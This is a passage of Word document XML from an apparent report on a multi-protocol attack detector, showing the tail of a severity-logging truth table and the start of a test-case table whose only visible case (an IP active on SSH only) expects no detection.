              <w:top w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
            </w:tcBorders>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Y</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1200" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
            </w:tcBorders>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">N</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1200" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
            </w:tcBorders>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">N</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1200" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
            </w:tcBorders>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">N</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005C6601" w:rsidRPr="005C6601" w14:paraId="5C3E1234" w14:textId="77777777" w:rsidTr="005C6601">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3200" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
            </w:tcBorders>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Log MULTI_PROTOCOL_ATTACK — HIGH</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1200" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
            </w:tcBorders>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">N</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1200" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
            </w:tcBorders>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Y</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1200" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
            </w:tcBorders>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">N</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1200" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
            </w:tcBorders>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">N</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005C6601" w:rsidRPr="005C6601" w14:paraId="5C3E1234" w14:textId="77777777" w:rsidTr="005C6601">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3200" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
            </w:tcBorders>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Log MULTI_PROTOCOL_ATTACK — CRITICAL</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1200" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
            </w:tcBorders>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">N</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1200" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
            </w:tcBorders>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">N</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1200" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
            </w:tcBorders>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Y</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1200" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
            </w:tcBorders>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Y</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="589378CE" w14:textId="7E0FB37B" w:rsidR="003272AD" w:rsidRDefault="003272AD" w:rsidP="00F0564A">
      <w:pPr>
        <w:keepNext/>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="276" w:lineRule="auto"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Test Cases:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7608910A" w14:textId="32DFBA61" w:rsidR="00F0564A" w:rsidRDefault="00F0564A" w:rsidP="00F0564A">
      <w:pPr>
        <w:pStyle w:val="Caption"/>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Table </w:t>
      </w:r>
      <w:fldSimple w:instr=" SEQ Table \* ARABIC ">
        <w:r>
          <w:t xml:space="preserve">25</w:t>
        </w:r>
      </w:fldSimple>
      <w:r>
        <w:t xml:space="preserve">: Test Cases for Multi-Protocol Attack Detection</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:w="82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466"/>
        <w:gridCol w:w="1648"/>
        <w:gridCol w:w="1669"/>
        <w:gridCol w:w="1899"/>
        <w:gridCol w:w="1899"/>
        <w:gridCol w:w="699"/>
      </w:tblGrid>
      <w:tr w:rsidR="005C6601" w:rsidRPr="005C6601" w14:paraId="2EBA6366" w14:textId="77777777" w:rsidTr="005C6601">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="380" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
            </w:tcBorders>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">No.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1700" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
            </w:tcBorders>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Test Case / Script</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1700" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
            </w:tcBorders>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Attribute and value</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1900" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
            </w:tcBorders>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Expected Result</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1900" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
            </w:tcBorders>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Actual Result</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="700" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
            </w:tcBorders>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Result</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005C6601" w:rsidRPr="005C6601" w14:paraId="2BEDD4C7" w14:textId="77777777" w:rsidTr="005C6601">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="380" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
            </w:tcBorders>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1700" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
            </w:tcBorders>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">IP active on SSH only</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1700" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
            </w:tcBorders>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">IP=10.22.0.1, {SSH}</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1900" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
            </w:tcBorders>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">No detection</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1900" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
            </w:tcBorders>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">No detection</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
